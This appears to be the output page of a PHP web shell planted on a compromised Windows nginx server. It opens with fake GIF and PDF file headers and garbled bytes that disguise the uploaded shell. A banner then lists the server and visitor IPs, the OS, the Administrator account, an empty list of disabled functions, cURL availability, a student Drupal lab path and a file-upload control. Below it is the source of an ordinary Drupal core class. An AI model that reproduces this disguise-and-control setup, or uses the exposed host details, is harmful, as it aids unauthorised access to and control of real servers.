GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/lib/Drupal/Core/Command/ |
Upload File : |
<?php namespace Drupal\Core\Command; use Symfony\Component\Console\Application; use Symfony\Component\Console\Input\InputInterface; /** * Provides a command to dump a database generation script. */ class DbDumpApplication extends Application { /** * {@inheritdoc} */ protected function getCommandName(InputInterface $input) { return 'dump-database-d8-mysql'; } /** * {@inheritdoc} */ protected function getDefaultCommands() { // Even though this is a single command, keep the HelpCommand (--help). $default_commands = parent::getDefaultCommands(); $default_commands[] = new DbDumpCommand(); return $default_commands; } /** * {@inheritdoc} * * Overridden so the application doesn't expect the command name as the first * argument. */ public function getDefinition() { $definition = parent::getDefinition(); // Clears the normal first argument (the command name). $definition->setArguments(); return $definition; } }